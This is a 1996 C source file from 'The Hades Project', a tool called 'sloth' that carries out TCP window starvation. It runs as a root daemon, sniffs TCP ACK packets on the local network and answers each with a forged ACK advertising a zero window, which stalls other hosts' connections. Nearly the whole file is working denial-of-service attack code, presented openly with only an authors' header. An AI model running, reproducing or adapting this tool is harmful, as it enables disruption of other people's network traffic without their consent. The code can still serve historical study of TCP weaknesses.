/*
                            The Hades Project
                    Explorations in the Weakness of TCP
                          TCP Window Starvation
                                 (sloth)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to route@infonexus.com


   This coding project made possible by a grant from the Guild corporation

*/


#include "lnw.h"

	/* experiment with this value.  Different things happen with different sizes */

#define SLOTHWINDOW	0

void main(){

	void sl0th(struct iphdr *,struct tcphdr *,int);

	struct epack{				/* Generic Ethernet packet w/o data payload */
		struct ethhdr eth;		/* Ethernet Header */
		struct iphdr ip;		/* IP header */
		struct tcphdr tcp;		/* TCP header */
	}epack;

	int sock,shoe,dlen;
	struct sockaddr dest;
	struct iphdr  *iphp;
	struct tcphdr *tcphp;

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...\n");
                exit(0);
        }
	sock=tap(DEVICE);		/* Setup the socket and device */

				/* Could use the SOCK_PACKET but building Ethernet headers would
				 require more time overhead; the kernel can do it quicker then me */
	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("\nHmmm.... socket problems");
                exit(1);
        }  
	shadow();			/* Run as a daemon */	

	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   

   	/* Network reading loop */
	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->ack)sl0th(iphp,tcphp,shoe);
}


/*
 *	Build a packet and send it off.
 */

void sl0th(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
   	
	void dump(struct iphdr *,struct tcphdr *);
        
        struct tpack{			/* Generic TCP packet w/o payload */
                struct iphdr ip;	
                struct tcphdr tcp;
        }tpack;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pheader;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=tcphp->dest;       /* Source port */
        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */

                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */

        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
        tpack.tcp.seq=htonl(ntohl(tcphp->ack_seq));    /* 32-bit Sequence Number */
        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq));    /* 32-bit Acknowledgement Number */
        tpack.tcp.doff=5;              	/* Data offset */
        tpack.tcp.res1=0;              	/* reserved */
        tpack.tcp.res2=0;              	/* reserved */
      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
        tpack.tcp.psh=0;               	/* Push flag */
        tpack.tcp.rst=0;               	/* Reset flag */
        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
        tpack.tcp.fin=0;               	/* Finish sending flag */
        tpack.tcp.window=htons(SLOTHWINDOW);	 /* 16-bit Window size */
        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        tpack.ip.version=4;            	/* 4-bit Version */
        tpack.ip.ihl=5;                	/* 4-bit Header Length */
        tpack.ip.tos=0;                	/* 8-bit Type of service */
    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        tpack.ip.id=0;         		/* 16-bit ID field */
        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
        
        pheader.source_address=(unsigned)tpack.ip.saddr;
        pheader.dest_address=(unsigned)tpack.ip.daddr;
        pheader.placeholder=0;
     	pheader.protocol=IPPROTO_TCP;
        pheader.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);

	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
	dump(iphp,tcphp);
#endif
}

/* 
 *	Dumps some info...
 */

void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
	fprintf(stdout,"Hmm... I smell an ACK: ");
   	fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
	fprintf(stdout,"let's slow things down a bit\n");
}
